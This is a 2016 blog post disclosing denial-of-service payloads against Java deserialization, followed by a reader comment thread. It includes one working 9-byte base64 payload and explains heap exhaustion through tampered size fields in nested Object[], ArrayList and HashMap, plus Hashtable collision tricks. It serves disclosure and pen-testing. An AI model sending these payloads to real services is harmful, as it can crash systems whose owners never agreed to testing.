Friday, April 1, 2016

Java Deserialization DoS - payloads

Handy payloads for testing Java Deserialization vulnerability

GitHub project:

Update: A new attack vector against ObjectInputStream.readProxyDesc() using just 9 bytes: rO0ABX1////3


  • Generic heap overflow
  • Heap overflow using nested Object[] arrays 
  • Heap overflow using nested ArrayList
  • Heap overflow using nested HashMap
  • HashMap and Hashtable collisions attacks

Can be used to bypass blacklist protections or whitelists allowing Object[] array, ArrayList or HashMap.

Payloads to consume 8GB of heap:

Generic (9 bytes): 


Nested Object[] (44 bytes): 


Nested ArrayList (67 bytes):


Nested HashMap (110 bytes):



114 bytes to consume 64GB of heap (nested Object[]):


Short description of Heap overflow attacks

In order to minimize the payload size, I tamper with the "size" field of these classes, overwriting the serialized data so that the "size" is near Integer.MAX_VALUE even though the payload contains only a few entries.

During deserialization, the classes pre-allocate big arrays (based on "size") before the actual values are read. It is therefore not necessary to send all the values: an OutOfMemoryError is thrown after just a few allocations when the objects are nested, since an Object[] can contain another Object[].
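This pre-allocation can be demonstrated at a toy scale: serialize an empty Object[], patch the 4-byte array-length field in the stream (for an empty array it is the last field), and deserialization will allocate the array first and only then fail while reading the missing elements. A minimal sketch, assuming only standard java.io (the class and method names here are mine, and the fake length is tiny instead of near Integer.MAX_VALUE):

```java
import java.io.*;

public class ArraySizePatch {
    // Serialize an empty Object[], then patch the 4-byte array-length field
    // (the last bytes in the stream for an empty array) to a larger value.
    static String patchAndDeserialize(int fakeLength) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(new Object[0]);
        }
        byte[] payload = bos.toByteArray();
        payload[payload.length - 1] = (byte) fakeLength; // length 0 -> fakeLength

        try (ObjectInputStream ois =
                 new ObjectInputStream(new ByteArrayInputStream(payload))) {
            // ObjectInputStream reads the length, allocates Object[fakeLength],
            // and only then tries to read the (missing) element values.
            ois.readObject();
            return "no exception";
        } catch (IOException e) {
            return e.getClass().getSimpleName();
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(patchAndDeserialize(5));
    }
}
```

With a real payload the patched length is ~2^31, so the allocation itself is the attack; here the allocation is harmless and the truncated stream just produces an IOException.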

Let's look at the Object[] payload. It was modified to have the maximum possible array size: ArrayList.MAX_ARRAY_SIZE = Integer.MAX_VALUE - 8. This means an array of roughly 2 billion pointers (4 bytes each) => 2^31 * 4B = 8GB.
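A quick sanity check of that arithmetic (assuming 4-byte references, i.e. compressed oops; the class name is mine):

```java
public class HeapMath {
    // Bytes needed for the reference array backing a max-sized Object[]:
    // one pointer per element, 4 bytes per pointer with compressed oops.
    static long arrayBytes(long elements, long bytesPerPointer) {
        return elements * bytesPerPointer;
    }

    public static void main(String[] args) {
        long maxArraySize = Integer.MAX_VALUE - 8L; // ArrayList.MAX_ARRAY_SIZE
        long bytes = arrayBytes(maxArraySize, 4);
        System.out.printf("%.2f GB%n", bytes / (double) (1L << 30)); // ~8.00 GB
    }
}
```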

With 8 such Object[] arrays nested one inside another, the JVM allocates an 8GB array for the root object, then reads the first item: a nested Object[] that is again a max-sized array. So it allocates another 8GB, continues to deserialize the second-level array with yet another 8GB, and so on; sooner or later it fails with an OutOfMemoryError.
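The nesting shape can be sketched with harmlessly small arrays (in the real payload each level's length field is patched to ~Integer.MAX_VALUE; here each level holds one element, and the names are mine):

```java
public class NestedArrays {
    // Build a chain of Object[] arrays nested one inside another,
    // mirroring the structure of the nested Object[] payload.
    static Object[] nest(int depth) {
        Object[] root = new Object[1];
        Object[] current = root;
        for (int i = 1; i < depth; i++) {
            Object[] next = new Object[1];
            current[0] = next;   // each level contains the next level
            current = next;
        }
        return root;
    }

    // Walk the chain and count the levels.
    static int depthOf(Object[] root) {
        int depth = 1;
        while (root[0] instanceof Object[]) {
            root = (Object[]) root[0];
            depth++;
        }
        return depth;
    }

    public static void main(String[] args) {
        // 8 nested levels x 8 GB per max-sized level = 64 GB of attempted allocations
        System.out.println(depthOf(nest(8)));
    }
}
```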

Short description of HashMap and Hashtable collision attacks

HashMap in Java 1.7, when created with initialCapacity == loadFactor, creates one and only one bucket to store all items.
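The single-bucket condition has the same effect as every key hashing to the same bucket: in the JDK 7 HashMap, each insertion walks the whole collision chain, so n puts cost O(n^2) comparisons. A small illustration of the colliding-keys case (the Key class is a hypothetical example of mine):

```java
import java.util.HashMap;
import java.util.Map;

public class CollisionDemo {
    // Every Key reports the same hash code, so in a chained HashMap
    // all entries land in one bucket and each put scans the whole chain.
    static final class Key implements java.io.Serializable {
        final int id;
        Key(int id) { this.id = id; }
        @Override public int hashCode() { return 0; } // deliberate collision
        @Override public boolean equals(Object o) {
            return o instanceof Key && ((Key) o).id == id;
        }
    }

    static Map<Key, Integer> build(int n) {
        Map<Key, Integer> m = new HashMap<>();
        for (int i = 0; i < n; i++) {
            m.put(new Key(i), i); // O(i) chain scan per put in JDK 7
        }
        return m;
    }

    public static void main(String[] args) {
        System.out.println(build(1000).size());
    }
}
```

(JDK 8 mitigated this specific pattern by treeifying long chains of Comparable keys, but the single-bucket deserialization condition described above is independent of key hash codes.)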

Hashtable suffers from a similar condition during deserialization and accepts a negative loadFactor => just one bucket is used to store all items.
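For contrast, the public Hashtable constructor does validate the loadFactor; the bug described above is that (per the report) readObject() did not apply the same check, so a tampered stream could smuggle in a negative value. A minimal sketch of the constructor-side check (the wrapper class is mine):

```java
import java.util.Hashtable;

public class LoadFactorCheck {
    // The public constructor rejects loadFactor <= 0 with
    // IllegalArgumentException; deserialization (per the report above)
    // historically skipped this validation.
    static boolean constructorRejects(float loadFactor) {
        try {
            new Hashtable<String, String>(16, loadFactor);
            return false;
        } catch (IllegalArgumentException expected) {
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println(constructorRejects(-0.5f)); // true
    }
}
```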

Other info

Please use these payloads only for pen-testing / evaluation of your own products.

Reported to Oracle in 2015 with a "won't fix" response. The Hashtable negative-loadFactor bug is treated as a functional bug and should be fixed in a future release.


  1. The Nested HashMap payload is throwing '', because the 'size' field of the HashMap is transient.

  2. I didn't see the exception; try the GitHub project to test it.

    'size' is transient but it's explicitly written

    And then it's read as 'mappings'

    1. While deserializing, it throws an exception. In the code you are ignoring the exception; try printing the stack trace. I'm using the Oracle JDK.

      catch (OptionalDataException e) {
      // expected
      }

    2. And in the case of ArrayList, the serialization itself throws an exception (IndexOutOfBoundsException: 10). In the code you are ignoring the exception. I'm using the Oracle JDK.

    3. I see, yes, it throws exceptions.

      But they are expected, because we change the internal state of the ArrayList/HashMap, and serialization/deserialization is not prepared for that. OptionalDataException is thrown because fewer items are serialized than the code expects. But by the time it is thrown, the arrays have already been allocated and have consumed the heap.

      What's your point?
